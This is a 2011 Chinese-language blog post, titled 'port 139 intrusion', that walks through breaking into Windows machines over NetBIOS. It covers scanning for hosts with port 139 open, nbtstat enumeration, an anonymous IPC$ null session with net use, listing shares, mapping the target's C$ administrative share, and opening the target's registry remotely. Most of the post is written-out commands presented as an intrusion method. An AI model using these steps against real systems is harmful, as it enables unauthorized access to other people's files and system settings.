139端口入侵

首先当然是扫一下网上开了139端口的机子了
其实139端口也就是NetBIOS session端口 进行文件和打印共享的端口,你要先用NBTSTAT看一下NETBIOS的信息
命令方式nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s] [interval]开关: -a 列出给定主机名的远程计算机的名字表(name table)
-A 列出给定IP地址的远程计算机的名字表 -c 列出远程名字缓冲区(name cache),包括IP地址
-n 列出本地NetBIOS 名字
-r 列出通过广播(broadcast)和WINS解析的名字
-R 清除和重新装入远程的缓冲的名字表
-S 列出和目标IP地址会话的表
-s 列出会话表转换

OK,我们在来看看共享
C:\>net view \\[目标计算机的IP地址]
不过有可能会被拒绝
在试试C:\>net use \\IP\ipc$ "" /user:""
The command completed successfully.
C:\>net view \\IP Shared resources at \\IP
Share name Type Used as Comment

IPC成功建立后,服务器的共享资源列表才能访问到
我们在看一下有没有可以用net命令进行连接的。
c:\>net use x: \\[ipaddr]\[share]
万一不行的话我们就用上面的方法IPC$

一旦IPC$共享顺利完成,我们就可以映射了:
c:\>net use g: \\IP\c$

得到了C$共享,并将该目录映射到g:,键入:
c:\>dir g: /p

就能显示这个目录的所有内容。

成功地进行了IPC$连接后,点击Start -> Run,键入regedit。选择Registry -> Connect Network Registry,再键入那台机器的IP地址。不一会,就能看目标计算机的的Registry了。

posted @ 2011-05-25 17:41  ACE封印  Views(1255)  Comments(0Edit  收藏  举报